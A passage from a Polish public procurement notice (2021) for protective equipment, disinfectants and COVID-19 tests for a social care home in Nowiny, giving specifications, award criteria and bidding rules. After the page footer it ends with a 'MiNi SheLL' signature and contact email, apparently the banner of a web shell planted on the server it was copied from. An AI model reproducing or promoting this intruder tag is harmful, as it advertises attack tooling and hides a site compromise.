pełnotwarzowa, rodzaj filtra F3(węglowy + HEPA)- zgodność z normami PN-EN 149:2001+A1:2010 (EN 149:2001+A1:2009) EN 149:2001+A1:2019	do 500 sztuk 3.	Rękawice nitrylowe rozm. M, kolor niebieski, pasują na lewą i prawą rękę, nie wykazują właściwości alergizujących, ochrona przed wirusami oraz krwiopochodnymi patogenami, wykończenie mankietu – rolowany brzeg, norma: EN 455-1,2,3,4;wykonane z 100% nitrylu	do 18 966 sztuk 4.	Płyn do dezynfekcji rąk o działaniu wirusobójczym, bakteriobójczym i grzybobójczymSkład: alkohol etylowy 100% (70% masy produktu), woda, alkohol tetra-butylowy, w opakowaniach 5 litrowych, składnik alkohol etylowy 96%, klasyfikacja Flam.Liq.2,H225, stężenie 73,00%, składnik alkohol izopropylowy, klasyfikacja Flam Liq 2, Eye Irrit 2, STOT SE 3, H225, H319, H336, stężenie 10%, brak gliceryny stężenie 10%, brak wody destylowanej stężenie 7,0%. Wygląd ciecz bezbarwna, zapach charakterystyczny alkoholowy. do 4 opakowań 5.	Płyn bakteriobójczy do zmywarekśrodek czyszczący, skład wodorotlenek sodu, stężenie 10 - 60 ºC), gwarancja 24 miesiące, produkt ma następujące właściwości LZO zawartość 0% masa, gęstość LZO O KG/M3, stan skupienia- ciecz, kolor bezbarwny, 8,5 - 18,5pH: Lepkość kinematyczna 40 ºC:1,35 cSt, Lepkość kinematyczna 20 ºC:1,54 cP, Lepkość dynamiczna 20 ºC:1,141, gęstość względna 20 ºC:1125 - 1135 kg/m³, opakowanie 5 l.	do 3 opakowań 6.	Maseczki jednorazowe chirurgiczne, trójwarstwowe, posiadające gumkę umożliwiającą założenie maseczki o uszy lub z elastycznym paskiem do zamocowania na uszach(nie wiązane). W części środkowej mają posiadać zakładki (harmonijka) umożliwiające dopasowanie maseczki do kształtu twarzy – zakrycie nosa, ust i brody. W jednej krawędzi mają posiadać wzmocnienie umożliwiające dopasowanie maseczki do nosa zapewniające szczelność przylegania. Skuteczność filtracji bakteryjnej na poziomie większym lub równym 98%.Powinny spełniać zgodność z normą PN-EN 14683,Oznakowanie znakiem CE, pakowane po 50 szt. do 151 opakowań 7.	Proszek bakteriobójczy do prania posiada atest Państwowego Zakładu Higieny, oraz opinię Zakładu Zwalczania Skażeń Biologicznych PZH w Warszawie, proszek o barwie białej do kremowo-szarej z zielonymi wtrąceniami, pH 1% roztworu w wodzie: 10,3-10,8, Gęstość względna (ciężar nasypowy): 0,88-0,98 g/cm3n rozpuszczalność w wodzie: - >95 g/dm3 po wymieszaniu. Zawiera węglan sodu15- </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <p class="mb-0">33190000-8 - Różne urządzenia i produkty medyczne</p> <p class="mb-0">33631600-8 - Środki antyseptyczne i dezynfekcyjne</p> <p class="mb-0">35113410-6 - Odzież ochrony biologicznej i chemicznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-04-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 3: Dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w NowinachPrzedmiotem zamówienia jest dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w Nowinach.Zamówienie dotyczy projektu współfinansowanego ze środków Unii Europejskiej. Zadanie realizowane jest w ramach projektu pn. „Wsparcie działań związanych z przeciwdziałaniem skutkom rozprzestrzeniania się pandemii COVID-19 w domach pomocy społecznej” ze środków Programu Operacyjnego Wiedza Edukacja Rozwój finansowanego ze środków Europejskiego Funduszu Społecznego na lata 2014-2020.Lp.	Nazwa asortymentu planowanego do zakupu	Ilość1.	Fartuch jednorazowy włókninowy stanowiący barierę dla cząstek, o dobrej przepuszczalności powietrza, wiązany z tyłu na troki, rękawy wykończone gumką, minimum 25 g/m² , rozmiar nie mniejszy niż LZgodność z normą PN-EN 13795-1:2019- deklaracja zgodności z wymaganiami dyrektywy 93/42/EWG- oznakowanie znakiem CE;	do 1 000 sztuk2.	Maska z filtrem co najmniej FFP2, pięciowarstwowa, płaska bez zaworu, posiadająca gumkę umożliwiającą założenie maseczki o uszy. W części środkowej mają posiadać zakładki (harmonijka) umożliwiające dopasowanie maseczki do kształtu twarzy – zakrycie nosa, ust i brody. W jednej krawędzi mają posiadać wzmocnienie umożliwiające dopasowanie maseczki do nosa zapewniające szczelność przylegania.- zgodność z normami PN-EN 149:2001+A1:2019- deklaracja zgodności z wymaganiami dyrektywy 93/42/EWG- PN-EN 14683 w zakresie Typ I, II, IIR,- oznakowanie znakiem CE.	do 500 sztuk3.	Rękawice nitrylowe bezpudrowe rozm. M po 100 szt. w opakowaniu.- Pasują na lewą i prawą rękę;- Nie wykazują właściwości alergizujących;- Ochrona przed wirusami oraz krwiopochodnymi patogenami;- Wykończenie mankietu – rolowany brzeg;-norma: PN-EN 455-1,2,3,4	do 500 opakowań4.	Rękawice winylowe bezpudrowe rozm. M po 100 szt. w opakowaniu.- Pasują na lewą i prawą rękę;- Nie wykazują właściwości alergizujących;- Ochrona przed wirusami oraz krwiopochodnymi patogenami;- Wykończenie mankietu – rolowany brzeg;-norma: PN-EN 455-1,2,3,4	do 1 000 opakowań5.	Rękawice winylowe bezpudrowe rozm. L po 100 szt. w opakowaniu.- Pasują na lewą i prawą rękę;- Nie wykazują właściwości alergizujących;- Ochrona przed wirusami oraz krwiopochodnymi patogenami;- Wykończenie mankietu – rolowany brzeg;-norma: PN-EN 455-1,2,3,4	do 710 opakowań6.	Maseczki jednorazowe chirurgiczne, trójwarstwowe, posiadające gumkę umożliwiającą założenie maseczki o uszy lub z elastycznym paskiem do zamocowania na uszach( nie wiązane). W części środkowej mają posiadać zakładki (harmonijka) umożliwiające dopasowanie maseczki do kształtu twarzy – zakrycie nosa, ust i brody. W jednej krawędzi mają posiadać wzmocnienie umożliwiające dopasowanie maseczki do nosa zapewniające szczelność przylegania.Powinny spełniać zgodność z normą PN-EN 14683, oznakowanie znakiem CE.	do 10 000 sztuk7.	Płyn antybakteryjny do mycia podłóg.Płynny koncentrat do jednoczesnego mycia i dezynfekcji powierzchni w obszarze medycznym.Produkt posiada działanie wirusobójcze, bakteriobójcze, prątkobójcze i drożdżakobójcze.Skład: substancje czynne w 100 g produktu: 3,76 g N-(3-aminopopylo)-N-dodecylopropano-1,3–diamina (CAS: 2372-82-9), 3,39 g Poli(oksy-1,2-etanodilo),.alfa.-[2-(didecylmetyloamino) etylo]-.omega.-hydroksy-,propanian(sól) (CAS: 94667-33-1), 0,75 g 2-aminoetanol (CAS: 141-43-5)	do 114 litrów 8.	Testy na obecność koronawirusa.-Kasetkowe, antygenowe, wymaz z nosogardzieli, czas pomiaru ok. 20 minut,-Ma spełniać wymogi WHO – czyli min 90% czułości i min. 95% swoistości. -Posiadać mają badania kliniczne oraz wszystkie respektowane certyfikaty i atesty, w tym oczywiście CE, są dopuszczone do obrotu i używania w Polsce. -Test antygenowy posiadać ma zgłoszenie do URPL ( Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych).	do 600 sztukZamawiający zastrzega, że ilości towaru są ilościami szacunkowymi. Zamawiający zastrzega sobie możliwość, w czasie trwania umowy, zmniejszenia ilości zakupionego towaru, nie mniej jednak niż do 80% ilości wskazanych w formularzu cenowym. Jeżeli w wyniku takiej sytuacji wynagrodzenie należne Wykonawcy ulegnie odpowiedniemu pomniejszeniu Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego z tego tytułu.Dostarczony przedmiot zamówienia będzie fabrycznie nowy, pierwszego gatunku, wolny od wad fizycznych i prawnych, będzie spełniać wymogi określone obowiązującym prawem oraz normy wskazane w SWZ, został dopuszczony do obrotu handlowego i posiada wymagane prawem atesty i pozwolenia, a także ważne dokumenty, stwierdzające dopuszczenie do stosowania na terenie Polski oraz spełnia wszystkie wymogi dopuszczające do użytkowania w jednostkach służby zdrowia.Dostarczony towar musi posiadać aktualny termin przydatności do użycia, nie krótszy niż 24 miesięcy.Wykonawca zobowiązany jest do właściwego zabezpieczenia przedmiotu zamówienia na czas przewozu i do jego dostarczenia do jednostki organizacyjnej Zamawiającego tj. Domu Pomocy Społecznej w Nowinach, Nowiny101, 22-105 Okszów. Odpowiedzialność za ewentualne szkody powstałe w trakcie dostawy ponosi Wykonawca. Dostawa towaru obejmuje również jego rozładunek pod adresem jednostki organizacyjnej Zamawiającego tj. Domu Pomocy Społecznej w Nowinach.Transport, dostawa i rozładunek realizowane będą na koszt i ryzyko Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <p class="mb-0">33190000-8 - Różne urządzenia i produkty medyczne</p> <p class="mb-0">33631600-8 - Środki antyseptyczne i dezynfekcyjne</p> <p class="mb-0">35113410-6 - Odzież ochrony biologicznej i chemicznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-04-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia, zgodnie z art. 57 ustawy, mogą ubiegać się Wykonawcy, którzy:1) nie podlegają wykluczeniu,2) spełniają warunki udziału w postępowaniu, o ile zostały one określone przez Zamawiającego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający na wezwanie zgodnie z art. 274 ust. 1 ustawy, żąda następujących podmiotowych środków dowodowych:a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej według wzoru stanowiącego załącznik nr 3 do SWZ.b) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo lub inny dokument, opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, z którego wynika prawo do podpisania oferty oraz innych dokumentów składanych wraz z ofertą, chyba że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346, z późn. zm.), a Wykonawca wskazał to wraz ze złożeniem oferty.Pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, zgodnie z art. 58 ust. 2 ustawy (dotyczy również wspólników spółki cywilnej).Pełnomocnictwa, o których mowa wyżej powinny być sporządzone w postaci dokumentu elektronicznego, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ww. ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.Oferta wraz z załącznikami powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy. Oferta sporządzona w postaci elektronicznej powinna być podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę uprawnioną, zgodnie z forma reprezentacji Wykonawcy określona w rejestrze sądowym lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy, albo przez osobę umocowaną (na podstawie pełnomocnictwa) przez osoby uprawnione.We wszystkich opracowywanych dokumentach Wykonawca winien stosować logotypy Funduszy Europejskich, barw Rzeczypospolitej Polskiej i znaku Unii Europejskiej na podstawie „Podręcznika wnioskodawcy i beneficjenta programów polityki spójności” dostępnego na stronie internetowej https://www.power.gov.pl/strony/o-programie/promocja/zasady-promocji-i-oznakowania-projektow-w-programie/zasady-promocji-i-oznakowania-projektow-w-programie-umowy-podpisane-od-1-stycznia-2018-roku/. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Do Wykonawców wspólnie ubiegających się o udzielenie zamówienia stosuje się odpowiednio przepisy ustawy dotyczące Wykonawców. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie o braku podstaw wykluczenia, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, które zostaną wprowadzone do treści umowy określone zostały we wzorach umów stanowiących załączniki nr 4a, 4b i 4c do SWZ.Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz w zakresie wskazanym we wzorach umów stanowiących załączniki nr 4a, 4b i 4c do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.powiatchelmski.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zmieniono termin otwarcia ofert na 02.04.2021 r.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com